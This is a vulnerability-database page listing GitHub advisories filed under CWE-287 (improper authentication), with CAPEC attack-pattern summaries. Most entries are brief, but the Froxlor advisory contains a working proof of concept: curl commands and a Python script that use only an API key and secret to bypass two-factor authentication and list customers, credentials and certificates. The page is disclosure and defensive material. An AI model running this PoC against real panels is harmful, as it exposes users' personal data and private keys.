Common Weakness Enumeration

CWE-287

Discouraged

Improper Authentication

Abstraction: Class · Status: Draft

When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

5970 vulnerabilities reference this CWE, most recent first.

GHSA-F92H-C5MH-QV8V

Vulnerability from github – Published: 2022-12-13 00:30 – Updated: 2022-12-15 18:30
VLAI
Details

Due to a missing authentication check, SAP Business Objects Business Intelligence Platform (Web Intelligence) - versions 420, 430, allows an authenticated non-administrator attacker to modify the data source information for a document that is otherwise restricted. On successful exploitation, the attacker can modify information causing a limited impact on the integrity of the application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-41263"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-352"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-12T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Due to a missing authentication check, SAP Business Objects Business Intelligence Platform (Web Intelligence) - versions 420, 430, allows an authenticated non-administrator attacker to modify the data source information for a document that is otherwise restricted. On successful exploitation, the attacker can modify information causing a limited impact on the integrity of the application.",
  "id": "GHSA-f92h-c5mh-qv8v",
  "modified": "2022-12-15T18:30:25Z",
  "published": "2022-12-13T00:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41263"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/3249648"
    },
    {
      "type": "WEB",
      "url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F93H-F4MQ-GCFJ

Vulnerability from github – Published: 2023-07-13 21:30 – Updated: 2024-04-04 06:07
VLAI
Details

The configuration from the PCU can be modified without authentication using physical connection to the PCU.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-30560"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-13T19:15:09Z",
    "severity": "MODERATE"
  },
  "details": "The configuration from the PCU can be modified without authentication using physical connection to the PCU. \n\n\n\n\n\n\n\n",
  "id": "GHSA-f93h-f4mq-gcfj",
  "modified": "2024-04-04T06:07:36Z",
  "published": "2023-07-13T21:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30560"
    },
    {
      "type": "WEB",
      "url": "https://www.bd.com/en-us/about-bd/cybersecurity/bulletin/bd-alaris-system-with-guardrails-suite-mx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F96P-7QR6-2QH9

Vulnerability from github – Published: 2025-07-08 15:32 – Updated: 2025-07-08 15:32
VLAI
Details

Cryptographic issue occurs due to use of insecure connection method while downloading.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-21450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-08T13:15:30Z",
    "severity": "CRITICAL"
  },
  "details": "Cryptographic issue occurs due to use of insecure connection method while downloading.",
  "id": "GHSA-f96p-7qr6-2qh9",
  "modified": "2025-07-08T15:32:02Z",
  "published": "2025-07-08T15:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21450"
    },
    {
      "type": "WEB",
      "url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2025-bulletin.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9F4-96J3-5MVR

Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2025-10-22 00:32
VLAI
Details

Microsoft Exchange Information Disclosure Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33766"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-14T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Exchange Information Disclosure Vulnerability",
  "id": "GHSA-f9f4-96j3-5mvr",
  "modified": "2025-10-22T00:32:18Z",
  "published": "2022-05-24T19:07:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33766"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-33766"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-798"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9GP-VXR4-29WQ

Vulnerability from github – Published: 2023-04-27 12:30 – Updated: 2024-04-04 03:42
VLAI
Details

This vulnerability exists in GajShield Data Security Firewall firmware versions prior to v4.28 (except v4.21) due to insecure default credentials which allows remote attacker to login as superuser by using default username/password via web-based management interface and/or exposed SSH port thereby enabling remote attackers to execute arbitrary commands with administrative/superuser privileges on the targeted systems.

The vulnerability has been addressed by forcing the user to change their default password to a new non-default password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-1778"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-27T10:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "This vulnerability exists in GajShield Data Security Firewall firmware versions prior to v4.28 (except v4.21) due to insecure default credentials which allows remote attacker to login as superuser by using default username/password via web-based management interface and/or exposed SSH port thereby enabling remote attackers to execute arbitrary commands with administrative/superuser privileges on the targeted systems.\n\nThe vulnerability has been addressed by forcing the user to change their default password to a new non-default password.\n",
  "id": "GHSA-f9gp-vxr4-29wq",
  "modified": "2024-04-04T03:42:42Z",
  "published": "2023-04-27T12:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1778"
    },
    {
      "type": "WEB",
      "url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2023-0119"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9JM-979C-8PX2

Vulnerability from github – Published: 2022-05-13 01:36 – Updated: 2022-05-13 01:36
VLAI
Details

Bypassing password security vulnerability in McAfee Application and Change Control (MACC) 7.0.1 and 6.2.0 allows authenticated users to perform arbitrary command execution via a command-line utility.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-3912"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-18T22:29:00Z",
    "severity": "HIGH"
  },
  "details": "Bypassing password security vulnerability in McAfee Application and Change Control (MACC) 7.0.1 and 6.2.0 allows authenticated users to perform arbitrary command execution via a command-line utility.",
  "id": "GHSA-f9jm-979c-8px2",
  "modified": "2022-05-13T01:36:41Z",
  "published": "2022-05-13T01:36:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-3912"
    },
    {
      "type": "WEB",
      "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10224"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/102988"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9M9-635M-G7GH

Vulnerability from github – Published: 2022-05-17 04:16 – Updated: 2022-05-17 04:16
VLAI
Details

The FTP backend in user_external in ownCloud Server before 5.0.18 and 6.x before 6.0.6 allows remote attackers to bypass intended authentication requirements via a crafted password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-9045"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2015-02-04T18:59:00Z",
    "severity": "MODERATE"
  },
  "details": "The FTP backend in user_external in ownCloud Server before 5.0.18 and 6.x before 6.0.6 allows remote attackers to bypass intended authentication requirements via a crafted password.",
  "id": "GHSA-f9m9-635m-g7gh",
  "modified": "2022-05-17T04:16:30Z",
  "published": "2022-05-17T04:16:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9045"
    },
    {
      "type": "WEB",
      "url": "https://owncloud.org/security/advisory/?id=oc-sa-2014-022"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-F9Q6-6W4M-G923

Vulnerability from github – Published: 2022-05-14 03:44 – Updated: 2022-05-14 03:44
VLAI
Details

The check_password function in html/admin/login.php in PacketFence before 3.0.2 allows remote attackers to bypass authentication via an empty password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2011-4068"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-01T17:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "The check_password function in html/admin/login.php in PacketFence before 3.0.2 allows remote attackers to bypass authentication via an empty password.",
  "id": "GHSA-f9q6-6w4m-g923",
  "modified": "2022-05-14T03:44:10Z",
  "published": "2022-05-14T03:44:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4068"
    },
    {
      "type": "WEB",
      "url": "https://packetfence.org/bugs/changelog_page.php?version_id=35"
    },
    {
      "type": "WEB",
      "url": "https://packetfence.org/bugs/view.php?id=1293"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9QM-247W-V472

Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-07-13 00:01
VLAI
Details

A remote authentication bypass vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-37736"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-15T13:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A remote authentication bypass vulnerability was discovered in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x prior to 6.10.2 - - ClearPass Policy Manager 6.9.x prior to 6.9.7-HF1 - - ClearPass Policy Manager 6.8.x prior to 6.8.9-HF1. Aruba has released patches for ClearPass Policy Manager that address this security vulnerability.",
  "id": "GHSA-f9qm-247w-v472",
  "modified": "2022-07-13T00:01:34Z",
  "published": "2022-05-24T19:17:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37736"
    },
    {
      "type": "WEB",
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-018.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F9RX-7WF7-JR36

Vulnerability from github – Published: 2026-06-03 21:41 – Updated: 2026-06-09 13:07
VLAI
Summary
Froxlor's API Authentication bypasses 2FA Authentication
Details

Summary

Froxlor's API authentication (FroxlorRPC::validateAuth) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.

An attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.

Affected Code

Web UI — 2FA enforced (index.php:82-149):

if ($result['type_2fa'] != 0) {
    // Redirects to 2FA input page
    // Calls FroxlorTwoFactorAuth::verifyCode()
    // Login is NOT completed without valid TOTP code
}

API — 2FA absent (lib/Froxlor/Api/FroxlorRPC.php:75-105):

private static function validateAuth(string $key, string $secret): bool
{
    $sel_stmt = Database::prepare("
        SELECT ak.*, a.api_allowed as admin_api_allowed,
               c.api_allowed as cust_api_allowed, c.deactivated
        FROM `api_keys` ak
        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid
        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid
        WHERE `apikey` = :ak AND `secret` = :as
    ");
    $result = Database::pexecute_first($sel_stmt, ['ak' => $key, 'as' => $secret]);
    if ($result) {
        if ($result['apikey'] == $key && $result['secret'] == $secret
            && ($result['valid_until'] == -1 || $result['valid_until'] >= time())
            && (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)
                || ($result['customerid'] > 0 && $result['cust_api_allowed'] == 1
                    && $result['deactivated'] == 0))) {
            // Checks: key match, secret match, not expired, API allowed, not deactivated
            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status
            return true;
        }
    }
    throw new Exception('Invalid authorization credentials', 403);
}

There are zero references to 2FA, TOTP, type_2fa, or FroxlorTwoFactorAuth in the entire lib/Froxlor/Api/ directory:

$ grep -rn '2fa\|totp\|two.factor\|FroxlorTwoFactor' lib/Froxlor/Api/
# (no output)

PoC

Environment

  • Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
  • API enabled (api.enabled=1)
  • Admin account has 2FA enabled (type_2fa=1, TOTP configured)
  • Admin has an API key

Step 1: Confirm 2FA blocks web UI login

POST /index.php HTTP/1.1
Host: panel.example.com
Content-Type: application/x-www-form-urlencoded

loginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send

Result: Redirect to index.php?showmessage=4 — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.

Step 2: Authenticate via API — no TOTP required

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{"command":"Customers.listing","params":{}}' \
  https://panel.example.com/api.php

Result: HTTP 200 with full customer listing:

{
  "data": {
    "list": [
      {
        "loginname": "testcust",
        "email": "test@froxlor.lab",
        "name": "Test",
        "firstname": "Customer"
      }
    ]
  }
}

No TOTP code was provided. No 2FA prompt was returned. Full access granted.

Step 3: Access additional sensitive resources

All of these succeed without any 2FA challenge:

# Domains
curl -s -u "KEY:SECRET" -d '{"command":"Domains.listing"}' .../api.php
# FTP accounts (home directories, credentials)
curl -s -u "KEY:SECRET" -d '{"command":"Ftps.listing"}' .../api.php
# Email accounts
curl -s -u "KEY:SECRET" -d '{"command":"Emails.listing"}' .../api.php
# MySQL databases
curl -s -u "KEY:SECRET" -d '{"command":"Mysqls.listing"}' .../api.php
# SSL certificates (private keys)
curl -s -u "KEY:SECRET" -d '{"command":"Certificates.listing"}' .../api.php
# DNS records
curl -s -u "KEY:SECRET" -d '{"command":"DomainZones.listing","params":{"domainname":"example.com"}}' .../api.php

165 API functions are accessible, including write operations (Customers.update, Domains.add, Ftps.add, etc.).

Automated PoC Script

#!/usr/bin/env python3
"""Froxlor <= 2.3.x — 2FA Bypass via API (CWE-287)"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

target, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]

r = requests.post(f"{target}/api.php", auth=(key, secret),
    json={"command": "Customers.listing", "params": {}}, verify=False)
data = r.json()

print(f"HTTP {r.status_code}")
if "data" in data:
    for c in data["data"].get("list", []):
        print(f"  {c['loginname']} | {c['email']}")
    print(f"\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET

Impact

When a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:

  • Customer data: PII (name, email, address) readable and modifiable
  • Domains: Full control over domains, subdomains, DNS records
  • Email accounts: Create, read, delete email accounts and forwarders
  • FTP accounts: Access home directory paths and credentials
  • MySQL databases: Full database management
  • SSL certificates: Read private keys, modify certificate bindings
  • 165 API functions: Including all write operations

API keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.

Comparison with CVE-2023-3173

CVE-2023-3173 ("2FA Bypass by Brute Force") was accepted as Critical ($60 bounty) and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.

Suggested Fix

Add 2FA verification to FroxlorRPC::validateAuth(). When the authenticated user has type_2fa != 0, require a TOTP code as an additional API parameter:

// lib/Froxlor/Api/FroxlorRPC.php, after line 100:
// Check 2FA if enabled for this user
if (!empty($result['adminid'])) {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id"),
        ['id' => $result['adminid']]
    );
} else {
    $user = Database::pexecute_first(
        Database::prepare("SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id"),
        ['id' => $result['customerid']]
    );
}
if ($user && $user['type_2fa'] != 0) {
    // Require X-2FA-Code header or 'totp_code' in request body
    $totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;
    if (empty($totp_code)) {
        throw new Exception('2FA code required', 401);
    }
    $tfa = new FroxlorTwoFactorAuth($user['data_2fa']);
    if (!$tfa->verifyCode($totp_code)) {
        throw new Exception('Invalid 2FA code', 403);
    }
}

Alternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-03T21:41:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nFroxlor\u0027s API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret \u2014 no TOTP challenge is issued, checked, or required.\n\nAn attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.\n\n## Affected Code\n\n**Web UI \u2014 2FA enforced** (`index.php:82-149`):\n\n```php\nif ($result[\u0027type_2fa\u0027] != 0) {\n    // Redirects to 2FA input page\n    // Calls FroxlorTwoFactorAuth::verifyCode()\n    // Login is NOT completed without valid TOTP code\n}\n```\n\n**API \u2014 2FA absent** (`lib/Froxlor/Api/FroxlorRPC.php:75-105`):\n\n```php\nprivate static function validateAuth(string $key, string $secret): bool\n{\n    $sel_stmt = Database::prepare(\"\n        SELECT ak.*, a.api_allowed as admin_api_allowed,\n               c.api_allowed as cust_api_allowed, c.deactivated\n        FROM `api_keys` ak\n        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid\n        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid\n        WHERE `apikey` = :ak AND `secret` = :as\n    \");\n    $result = Database::pexecute_first($sel_stmt, [\u0027ak\u0027 =\u003e $key, \u0027as\u0027 =\u003e $secret]);\n    if ($result) {\n        if ($result[\u0027apikey\u0027] == $key \u0026\u0026 $result[\u0027secret\u0027] == $secret\n            \u0026\u0026 ($result[\u0027valid_until\u0027] == -1 || $result[\u0027valid_until\u0027] \u003e= time())\n            \u0026\u0026 (($result[\u0027customerid\u0027] == 0 \u0026\u0026 $result[\u0027admin_api_allowed\u0027] == 1)\n                || ($result[\u0027customerid\u0027] \u003e 0 \u0026\u0026 $result[\u0027cust_api_allowed\u0027] == 1\n                    \u0026\u0026 $result[\u0027deactivated\u0027] == 0))) {\n            // Checks: key match, secret match, not expired, API allowed, not deactivated\n            // Missing: ANY check for type_2fa, TOTP verification, or 2FA status\n            return true;\n        }\n    }\n    throw new Exception(\u0027Invalid authorization credentials\u0027, 403);\n}\n```\n\nThere are zero references to 2FA, TOTP, `type_2fa`, or `FroxlorTwoFactorAuth` in the entire `lib/Froxlor/Api/` directory:\n\n```bash\n$ grep -rn \u00272fa\\|totp\\|two.factor\\|FroxlorTwoFactor\u0027 lib/Froxlor/Api/\n# (no output)\n```\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- API enabled (`api.enabled=1`)\n- Admin account has 2FA enabled (`type_2fa=1`, TOTP configured)\n- Admin has an API key\n\n### Step 1: Confirm 2FA blocks web UI login\n\n```\nPOST /index.php HTTP/1.1\nHost: panel.example.com\nContent-Type: application/x-www-form-urlencoded\n\nloginname=admin\u0026password=Admin123!@#\u0026csrf_token=TOKEN\u0026send=send\n```\n\n**Result:** Redirect to `index.php?showmessage=4` \u2014 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.\n\n### Step 2: Authenticate via API \u2014 no TOTP required\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"command\":\"Customers.listing\",\"params\":{}}\u0027 \\\n  https://panel.example.com/api.php\n```\n\n**Result:** HTTP 200 with full customer listing:\n\n```json\n{\n  \"data\": {\n    \"list\": [\n      {\n        \"loginname\": \"testcust\",\n        \"email\": \"test@froxlor.lab\",\n        \"name\": \"Test\",\n        \"firstname\": \"Customer\"\n      }\n    ]\n  }\n}\n```\n\nNo TOTP code was provided. No 2FA prompt was returned. Full access granted.\n\n### Step 3: Access additional sensitive resources\n\nAll of these succeed without any 2FA challenge:\n\n```bash\n# Domains\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Domains.listing\"}\u0027 .../api.php\n# FTP accounts (home directories, credentials)\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Ftps.listing\"}\u0027 .../api.php\n# Email accounts\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Emails.listing\"}\u0027 .../api.php\n# MySQL databases\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Mysqls.listing\"}\u0027 .../api.php\n# SSL certificates (private keys)\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"Certificates.listing\"}\u0027 .../api.php\n# DNS records\ncurl -s -u \"KEY:SECRET\" -d \u0027{\"command\":\"DomainZones.listing\",\"params\":{\"domainname\":\"example.com\"}}\u0027 .../api.php\n```\n\n165 API functions are accessible, including write operations (`Customers.update`, `Domains.add`, `Ftps.add`, etc.).\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor \u003c= 2.3.x \u2014 2FA Bypass via API (CWE-287)\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ntarget, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]\n\nr = requests.post(f\"{target}/api.php\", auth=(key, secret),\n    json={\"command\": \"Customers.listing\", \"params\": {}}, verify=False)\ndata = r.json()\n\nprint(f\"HTTP {r.status_code}\")\nif \"data\" in data:\n    for c in data[\"data\"].get(\"list\", []):\n        print(f\"  {c[\u0027loginname\u0027]} | {c[\u0027email\u0027]}\")\n    print(f\"\\n2FA-protected account accessed without TOTP. {len(data[\u0027data\u0027].get(\u0027list\u0027,[]))} customers exposed.\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET`\n\n## Impact\n\nWhen a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:\n\n- **Customer data**: PII (name, email, address) readable and modifiable\n- **Domains**: Full control over domains, subdomains, DNS records\n- **Email accounts**: Create, read, delete email accounts and forwarders\n- **FTP accounts**: Access home directory paths and credentials\n- **MySQL databases**: Full database management\n- **SSL certificates**: Read private keys, modify certificate bindings\n- **165 API functions**: Including all write operations\n\nAPI keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.\n\n### Comparison with CVE-2023-3173\n\nCVE-2023-3173 (\"2FA Bypass by Brute Force\") was accepted as **Critical ($60 bounty)** and fixed by adding rate limiting to 2FA verification. This finding is architecturally different \u2014 the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.\n\n## Suggested Fix\n\nAdd 2FA verification to `FroxlorRPC::validateAuth()`. When the authenticated user has `type_2fa != 0`, require a TOTP code as an additional API parameter:\n\n```php\n// lib/Froxlor/Api/FroxlorRPC.php, after line 100:\n// Check 2FA if enabled for this user\nif (!empty($result[\u0027adminid\u0027])) {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id\"),\n        [\u0027id\u0027 =\u003e $result[\u0027adminid\u0027]]\n    );\n} else {\n    $user = Database::pexecute_first(\n        Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id\"),\n        [\u0027id\u0027 =\u003e $result[\u0027customerid\u0027]]\n    );\n}\nif ($user \u0026\u0026 $user[\u0027type_2fa\u0027] != 0) {\n    // Require X-2FA-Code header or \u0027totp_code\u0027 in request body\n    $totp_code = $_SERVER[\u0027HTTP_X_2FA_CODE\u0027] ?? null;\n    if (empty($totp_code)) {\n        throw new Exception(\u00272FA code required\u0027, 401);\n    }\n    $tfa = new FroxlorTwoFactorAuth($user[\u0027data_2fa\u0027]);\n    if (!$tfa-\u003everifyCode($totp_code)) {\n        throw new Exception(\u0027Invalid 2FA code\u0027, 403);\n    }\n}\n```\n\nAlternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.",
  "id": "GHSA-f9rx-7wf7-jr36",
  "modified": "2026-06-09T13:07:18Z",
  "published": "2026-06-03T21:41:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-f9rx-7wf7-jr36"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-34qg-65m4-f23m"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Froxlor\u0027s API Authentication bypasses 2FA Authentication"
}

Mitigation
Architecture and Design

Strategy: Libraries or Frameworks

Use an authentication framework or library such as the OWASP ESAPI Authentication feature.

CAPEC-114: Authentication Abuse

An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.

CAPEC-115: Authentication Bypass

An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.

CAPEC-151: Identity Spoofing

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.

CAPEC-194: Fake the Source of Data

An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.

CAPEC-22: Exploiting Trust in Client

An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.

CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data

This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.

CAPEC-593: Session Hijacking

This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.

